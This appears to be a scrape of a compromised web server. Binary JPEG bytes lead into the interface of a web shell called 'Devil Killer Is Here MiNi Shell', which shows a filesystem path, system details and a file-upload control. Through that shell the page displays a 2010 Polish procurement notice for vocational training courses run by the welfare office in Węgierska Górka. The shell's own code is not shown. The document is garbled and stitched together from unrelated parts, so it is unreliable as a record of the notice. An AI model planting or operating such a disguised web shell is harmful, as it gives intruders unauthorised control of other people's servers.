JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /proc/self/root/proc/self/root/home/vmanager/www/common/web/tenders/20100610/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : //proc/self/root/proc/self/root/home/vmanager/www/common/web/tenders/20100610/163258-N-2010.html

<p class="kh_header"><b>Węgierska Górka: Przeprowadzenie szkoleń zawodowych dla podopiecznych Gminnego Ośrodka Pomocy Społecznej w  Węgierskiej Górce w ramach projektu systemowego  Aktywna integracja szansą rozwoju gminy Węgierska Górka Priorytet VII, Działania 7.1 Poddziałania 7.1.1 Programu Operacyjnego Kapitał Ludzki.</b><br>
<b>Numer ogłoszenia: 163258 - 2010; data zamieszczenia: 10.06.2010</b><br>
OGŁOSZENIE O ZAMÓWIENIU - usługi<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Gminny Ośrodek Pomocy Społecznej w Węgierskiej Górce , ul. Zielona 43, 34-350 Węgierska Górka, woj. śląskie, tel. 033 8623646, faks 033 8641780.</p>
<ul class="kh_indent_1">
</ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Przeprowadzenie szkoleń zawodowych dla podopiecznych Gminnego Ośrodka Pomocy Społecznej w  Węgierskiej Górce w ramach projektu systemowego  Aktywna integracja szansą rozwoju gminy Węgierska Górka Priorytet VII, Działania 7.1 Poddziałania 7.1.1 Programu Operacyjnego Kapitał Ludzki..</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> usługi.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Przedmiotem zamówienia są niżej opisane usługi szkoleń zawodowych dla uczestników projektu systemowego pod nazwą Aktywna integracja szansą rozwoju gminy Węgierska Górka realizowanego w ramach  Programu Operacyjnego Kapitał Ludzki Działanie 7.1 - Rozwój i upowszechnianie aktywnej integracji, współfinansowanego ze środków Europejskiego Funduszu Społecznego. 

Zamawiający przewiduje możliwość złożenia oferty przez jednego Wykonawcę na jedną lub więcej części zamówienia.

Podział przedmiotu zamówienia na zadania przedstawia się następująco:

Zadanie nr 1:
Kurs: Magazynier z obsługą wózków jezdniowych oraz bezpieczna wymiana butli gazowych dla 5 osób (135 godzin zegarowych) 
Wykonawca musi zapewnić:
- salę wykładową odpowiednio przystosowaną dla grupy min. 5 osobowej, 
- salę komputerową z min. 5 komputerami z dostępnym programem magazynowym i dostępem do Internetu,  
- plac manewrowy i halę magazynową do zajęć praktycznych z dostępem do WC.  
- komplet materiałów szkoleniowych dla wszystkich uczestników kursu + jeden egzemplarz dla GOPS w Węgierskiej Górce,
- min. 3 rodzaje kas fiskalnych
- wykwalifikowaną kadrę dydaktyczną,
- odzież ochronną,
- badania lekarskie i psychologiczne,
- kawę, herbatę, drobne ciastka, paluszki dla wszystkich uczestników w każdym dniu kursu,
- obiad dla wszystkich uczestników kursu w każdym dniu kursu(jedno ciepłe danie) ,
- dyplom, świadectwo lub zaświadczenie o ukończeniu kursu.
Minimalny zakres tematyczny:
- Budowa wózka
- Wiadomości z zakresu ładunkoznawstwa 
- Wiadomości z zakresu BHP
- Praktyczna nauka jazdy (minimum 15 godzin)
- Podstawy obsługi komputera oraz kasy fiskalnej
- Obsługa komputerowego programu do obsługi magazynu i hurtowni,
- Dokumentacja magazynowa oraz organizacja prac magazynowych
- Wymiana butli gazowych
Obsługa wózka widłowego z wymianą butli gazowej winien odbywać się zgodnie z programem dla kierowców wózków jezdniowych z napędem silnikowym zatwierdzonym przez Ośrodek Doskonalenia Kadr Ministerstwa Gospodarki w Mysłowicach.

Zadanie nr 2:
Kurs kucharz - kelner dla 6 osób (200 godzin zegarowych) 
Wykonawca musi zapewnić:
- salę wykładową odpowiednio przystosowaną dla grupy min. 5 osobowej, 
- komplet materiałów szkoleniowych dla wszystkich uczestników kursu + jeden egzemplarz dla GOPS w Węgierskiej Górce,
- min. 3 rodzaje kas fiskalnych
- wykwalifikowaną kadrę dydaktyczną,
- odzież ochronną, i środki czystości,
- badania lekarskie (książeczka SANEPIDu),
- materiały zużywalne do zajęć praktycznych (produkty mięsne, spożywcze),
- kawę, herbatę, drobne ciastka, paluszki dla wszystkich uczestników w każdym dniu kursu,
- dyplom, świadectwo lub zaświadczenie o ukończeniu kursu.
- każdy z uczestników musi mieć do dyspozycji własne stanowisko do gotowania (jedna osoba przy piecu),
Minimalny zakres tematyczny: 
- zasady żywienia
- Technologia gastronomiczna
- Towaroznawstwo
- Rysunek dekoracyjny
- Zajęcia praktyczne w zakresie kucharz  (minimum 100 godzin)
- Wykazywanie kultury osobistej i przestrzeganie etyki zawodowej
- Przygotowanie sali konsumpcyjnej
- Wyposażenie i obsługa sprzętu kelnerskiego w części konsumpcyjnej oraz ekspedycyjnej
- Noszenie zastawy
- Serwowanie potraw
- Wydawanie śniadań oraz przygotowywanie potraw w obecności konsumenta
- Serwowanie napojów bezalkoholowych oraz alkoholowych
- Organizacja przyjęć okolicznościowych
- Obsługa gości hotelowych przez kelnera
- Wystawianie rachunków

Zadanie nr 3:
Kurs sprzedawca z obsługą komputera i kasy fiskalnej dla 9 osób (120 godzin zegarowych) 
- salę wykładową odpowiednio przystosowaną dla grupy min. 9 osobowej, 
- salę komputerową z min. 9 komputerami z dostępem do Internetu, i podstawowym pakietem biurowym typu Office,
- min. 3 rodzaje kas fiskalnych
- komplet materiałów szkoleniowych dla wszystkich uczestników kursu + jeden egzemplarz dla GOPS w Węgierskiej Górce,
- badania lekarskie (książeczka SANEPIDu),
- wykwalifikowaną kadrę dydaktyczną,
- kawę, herbatę, drobne ciastka, paluszki dla wszystkich uczestników w każdym dniu kursu,
- obiad dla wszystkich uczestników kursu w każdym dniu kursu (jedno ciepłe danie)
- dyplom, świadectwo lub zaświadczenie o ukończeniu kursu.
Minimalny zakres tematyczny: 
- podstawowe zasady funkcjonowania firmy handlowej
- rozliczenia z kontrahentami					
- psychologia nowoczesnego sprzedawcy				
- marketing w handlu							
- kulisy procesu sprzedaży					
- obsługa kasy fiskalnej 						
- techniki obsługi Klienta z wykorzystaniem narzędzi komp.	
- obsługa komputera w tym programu do fakturowania

Wymagania wspólne dla wszystkich zadań:
1.Określone kursy zawodowe należy przeprowadzić w zakresie wiedzy teoretycznej i praktycznej z zakresu jaki obejmuje kurs.
2.Program szkolenia musi być zgodny z obowiązującymi w tym zakresie przepisami.
3.Zajęcia na szkoleniu powinny zaczynać się nie wcześniej niż o godzinie 8.00, kończyć nie             później niż o godzinie 20.00 i trwać 5-6 godzin zegarowych dziennie, w systemie tygodniowym (tj. od poniedziałku do piątku), nie częściej niż 4 razy w tygodniu,  w przypadkach uzasadnionych harmonogramem szkolenia zajęcia mogą odbywać się również w soboty. Szkolenie nie może odbywać się w dni ustawowo wolne od pracy.
     4.   W zakres kursu ma wchodzić przeszkolenie z zakresu bhp i ppoż.
  5. Wykonawca winien dostosować ilość i jakość pomieszczeń oraz wyposażyć w sprzęt i pomoce    dydaktyczne do potrzeb określonego szkolenia, z uwzględnieniem bezpiecznych i higienicznych warunków pracy i nauki. 
     6. Wykonawca jest zobowiązany do:
- przeprowadzenia lekarskich badań uczestnikom szkolenia i przekazania ich uwierzytelnionej kopii Zamawiającemu 
- ubezpieczenia uczestników kursów od następstw nieszczęśliwych wypadków. Listę kandydatów do ubezpieczenia Wykonawca otrzyma przed rozpoczęciem szkolenia. 
- prowadzenia dokumentacji szkolenia w postaci: dziennika zajęć edukacyjnych, protokołu z egzaminu, rejestru wydanych dyplomów, świadectw lub zaświadczeń
- podjęcia odpowiednich działań informacyjnych i promocyjnych zgodnie z wytycznymi obowiązującymi w ramach Programu Operacyjnego Kapitał Ludzki, min.: oznaczenia sal szkoleniowych poprzez wywieszenie plakatów dostarczonych przez Zamawiającego
- oznakowania wszelkiej dokumentacji szkolenia zgodnie z wytycznymi Zamawiającego i zasadami wizualizacji obowiązującymi w Programie Operacyjnym Kapitał Ludzki
- prowadzenia list obecności uczestników na zajęciach
- informowania Zamawiającego o  nieusprawiedliwionej nieobecności uczestnika na zajęciach
- niezwłocznego zawiadomienia na piśmie Zamawiającego o fakcie przerwania lub zawieszenia szkolenia, a także o wszelkich planowanych zmianach dotyczących szkolenia 
- przechowywania dokumentacji związanej z realizacją umowy do dnia 31 grudnia 2020
7. Wykładowcy i instruktorzy powinni posiadać minimalne doświadczenie zawodowe w dziedzinie, którą wykłada. Przez minimalne doświadczenie rozumie się przynajmniej 1 rok stażu zawodowego na stanowisku odpowiednim do prowadzenia zajęć z określonej kursem dziedziny.
8. Szkolenie winno zakończyć się wydaniem:
- zaświadczenia, świadectwa lub dyplomu z logo Programu Operacyjnego Kapitał Ludzki, logo Unii Europejskiej i informacji: Projekt Aktywna integracja szansą rozwoju gminy Węgierska Górka współfinansowany ze środków Unii Europejskiej w ramach Europejskiego Funduszu Społecznego, Priorytet VII, Działanie 7.1, Poddziałanie 7.1.1 Rozwój i upowszechnianie aktywnej integracji przez ośrodki pomocy społecznej.
9. Każdy uczestnik powinien bezpłatnie otrzymać zestaw pomocy dydaktycznych, które pomogą mu opanować omawiane zagadnienia.
10. Zamawiający zastrzega sobie prawo do kontroli prowadzonych szkoleń w trakcie ich realizowania.
11. Kursy w ramach zadania 1 i 3 powinny zostać przeprowadzone na terenie gminy Węgierska Górka, a zadania 2 w miejscowości oddalonej od siedziby Zamawiającego nie dalej jak 15 km..</p>
<p><b>II.1.4) Czy przewiduje się udzielenie zamówień uzupełniających:</b> nie.</p>

<p><b>II.1.5) Wspólny Słownik Zamówień (CPV):</b> 80.53.00.00-8.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty częściowej:</b> tak, liczba części: 3.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 30.09.2010.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>


<p><b>III.2) ZALICZKI</b></p>
<ul class="kh_indent_1"><li><b>Czy przewiduje się udzielenie zaliczek na poczet wykonania zamówienia:</b> nie</li></ul>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Wykonawca udokumentuje, że  w okresie ostatnich 3 lat przed upływem terminu składania ofert zorganizował min. 2 szkolenia o charakterze odpowiadającym przedmiotowi zamówienia - przedstawi odpowiednie referencje, zaświadczenia</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Warunek dysponowania osobami zdolnymi do wykonania zamówienia zostanie oceniony na podstawie złożonego przez wykonawcę oświadczenia o dysponowaniu specjalistami posiadającymi wiedzę teoretyczną oraz przygotowanie praktyczne w zakresie tematyki szkoleń.</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<ul class="kh_indent_1"><li>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnieniu warunków udziału w postępowaniu, należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">wykaz wykonanych, a w przypadku świadczeń okresowych lub ciągłych również wykonywanych, dostaw lub usług  w zakresie niezbędnym do wykazania spełniania warunku wiedzy i doświadczenia w okresie ostatnich trzech lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, z podaniem ich wartości, przedmiotu, dat wykonania i odbiorców, oraz załączeniem dokumentu potwierdzającego, że te dostawy lub usługi zostały wykonane lub są wykonywane należycie</li>

<li  style="margin-bottom: 12px;">oświadczenie, że osoby, które będą uczestniczyć w wykonywaniu zamówienia, posiadają wymagane uprawnienia, jeżeli ustawy nakładają obowiązek posiadania takich uprawnień</li>

</ul></li>

<li><p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru, jeżeli odrębne przepisy wymagają wpisu do rejestru, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert, a w stosunku do osób fizycznych oświadczenie w zakresie art. 24 ust. 1 pkt 2 ustawy</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego naczelnika urzędu skarbowego potwierdzające, że wykonawca nie zalega z opłacaniem podatków  lub zaświadczenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego oddziału Zakładu Ubezpieczeń Społecznych lub Kasy Rolniczego Ubezpieczenia Społecznego potwierdzające, że wykonawca nie zalega z opłacaniem składek na ubezpieczenie zdrowotne i społeczne, lub potwierdzenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu -  wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

</ul></li>
<li>
<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">nie zalega z uiszczaniem podatków, opłat, składek na ubezpieczenie społeczne i zdrowotne albo że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawiony nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

</ul></li>
</ul>
<p class="bold">III.6) INNE DOKUMENTY</p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>1)W celu potwierdzenia spełnienia warunków udziału w postępowaniu do oferty należy dołączyć: 

a)Formularz ofertowy (zał. nr.1)
b)Szczegółowa kalkulacja kosztów (zał. nr.1a)
c)Oświadczenie wykonawcy, że spełnienia warunki ubiegania się o udzielenie zamówienia z art. 22 ust. 1 pkt.1-4 Ustawy Prawo zamówień publicznych. (zał. nr.2)
d)Doświadczenie wykonawcy. Wykonawca udokumentuje, że  w okresie ostatnich 3 lat przed upływem terminu składania ofert zorganizował min. 2 szkolenia o charakterze odpowiadającym przedmiotowi zamówienia - przedstawi odpowiednie referencje, zaświadczenia (zał. nr.3)
e)Oświadczenie wykonawcy o dysponowaniu odpowiednim potencjałem technicznym oraz osobami zdolnymi do wykonania zamówienia (zał. nr 6)


2)  W celu wykazania braku podstaw do wykluczenia z postępowania o udzielenie zamówienia wykonawcy w okolicznościach, o których mowa w art. 24 ust. 1 ustawy należy złożyć następujące dokumenty w formie oryginału lub kserokopii poświadczonych za zgodność z oryginałem przez Wykonawcę lub osobę upoważnioną, z zachowaniem sposobu reprezentacji:

a)Oświadczenie o braku podstaw do wykluczenia z postępowania z powodu niespełnienia           warunków, o których mowa w art. 24 ust 1 Ustawy Prawo zamówień publicznych (zał. nr.4)
b)Aktualny odpis z właściwego rejestru, jeżeli odrębne przepisy wymagają wpisu do rejestru, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania ofert, a w stosunku do osób fizycznych oświadczenie w zakresie art. 24 ust. 1 pkt 2 ustawy 
c)Aktualne zaświadczenie właściwego naczelnika urzędu skarbowego potwierdzające, że wykonawca nie zalega z opłacaniem podatków lub zaświadczenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania ofert;
d)Aktualne zaświadczenie właściwego oddziału Zakładu Ubezpieczeń Społecznych lub Kasy Rolniczego Ubezpieczenia Społecznego potwierdzające, że wykonawca nie zalega z opłacaniem podatków oraz składek na ubezpieczenie zdrowotne i społeczne, lub potwierdzenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania ofert.
 
3.W wypadku oferty składanej przez wykonawców ubiegających się wspólnie o udzielenie zamówienia publicznego,  dokumenty potwierdzające że wykonawca nie podlega wykluczeniu składa każdy z wykonawców oddzielnie.   

4.Dokumenty, o których mowa wyżej, należy przedłożyć w formie oryginału lub kserokopii poświadczonej za zgodność z oryginałem przez wykonawcę lub osobę upoważnioną do składania oświadczeń woli w imieniu wykonawcy. W przypadku, gdy złożona przez wykonawcę kopia dokumentu będzie nieczytelna lub będzie budzić wątpliwości co do jej prawdziwości, zamawiający może zażądać przedstawienia oryginału lub notarialnie poświadczonej kopii dokumentu.</p>
<p><b>III.7) Czy ogranicza się możliwość ubiegania się o zamówienie publiczne tylko dla wykonawców, u których ponad 50 % pracowników stanowią osoby niepełnosprawne: </b>nie</p>


<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>cena oraz dodatkowe kryteria i ich znaczenie:</p><ul class="kh_indent_1">
<li>1 - Cena - 80</li>
<li>2 - posiadanie przez instytucję szkoleniową certyfikatu jakości usług - 20</li>
</ul>
<p><b>IV.2.2) Czy przeprowadzona będzie aukcja elektroniczna:</b> nie.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>Czy przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b>nie</p>

<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.bip.wegierska-gorka.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Gminny Ośrodek Pomocy Społecznej w Węgierskiej Górce
ul. Zielona 43
34-350 Węgierska Górka
pok. nr. 25 II piętro.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 18.06.2010 godzina 09:00, miejsce: Gminny Ośrodek Pomocy Społecznej w Węgierskiej Górce
ul. Zielona 43
34-350 Węgierska Górka
pok. nr. 25 II piętro.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>




<p><b>IV.4.16) Informacje dodatkowe, w tym dotyczące finansowania projektu/programu ze środków Unii Europejskiej:</b> Zamówienie jest finansowane ze środków Europejskiego Funduszu Społecznego w ramach projektu systemowego pod nazwą Aktywna integracja szansą rozwoju gminy Węgierska Górka realizowanego 
w ramach  Programu Operacyjnego Kapitał Ludzki Działanie 7.1 - Rozwój i upowszechnianie aktywnej integracji..</p>
<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> tak</p>
<p class="text kh_title">ZAŁĄCZNIK I - INFORMACJE DOTYCZĄCE OFERT CZĘŚCIOWYCH</p>
<p><b>CZĘŚĆ Nr:</b> 1 <b>NAZWA:</b> Magazynier z obsługą wózków jezdniowych oraz bezpieczna wymiana butli gazowych.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Kurs: Magazynier z obsługą wózków jezdniowych oraz bezpieczna wymiana butli gazowych dla 5 osób (135 godzin zegarowych) 
Wykonawca musi zapewnić:
- salę wykładową odpowiednio przystosowaną dla grupy min. 5 osobowej, 
- salę komputerową z min. 5 komputerami z dostępnym programem magazynowym i dostępem do Internetu,  
- plac manewrowy i halę magazynową do zajęć praktycznych z dostępem do WC.  
- komplet materiałów szkoleniowych dla wszystkich uczestników kursu + jeden egzemplarz dla GOPS w Węgierskiej Górce,
- min. 3 rodzaje kas fiskalnych
- wykwalifikowaną kadrę dydaktyczną,
- odzież ochronną,
- badania lekarskie i psychologiczne,
- kawę, herbatę, drobne ciastka, paluszki dla wszystkich uczestników w każdym dniu kursu,
- obiad dla wszystkich uczestników kursu w każdym dniu kursu(jedno ciepłe danie) ,
- dyplom, świadectwo lub zaświadczenie o ukończeniu kursu.
Minimalny zakres tematyczny:
- Budowa wózka
- Wiadomości z zakresu ładunkoznawstwa 
- Wiadomości z zakresu BHP
- Praktyczna nauka jazdy (minimum 15 godzin)
- Podstawy obsługi komputera oraz kasy fiskalnej
- Obsługa komputerowego programu do obsługi magazynu i hurtowni,
- Dokumentacja magazynowa oraz organizacja prac magazynowych
- Wymiana butli gazowych
Obsługa wózka widłowego z wymianą butli gazowej winien odbywać się zgodnie z programem dla kierowców wózków jezdniowych z napędem silnikowym zatwierdzonym przez Ośrodek Doskonalenia Kadr Ministerstwa Gospodarki w Mysłowicach..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 80.53.00.00-8.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 30.09.2010.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>cena oraz dodatkowe kryteria i ich znaczenie:</p>
<ul class="kh_indent_1">
<li>1. Cena - 80</li>
<li>2. posiadanie przez instytucję szkoleniową certyfikatu jakości usług - 20</li>
</ul>
</li>
</ul><br>
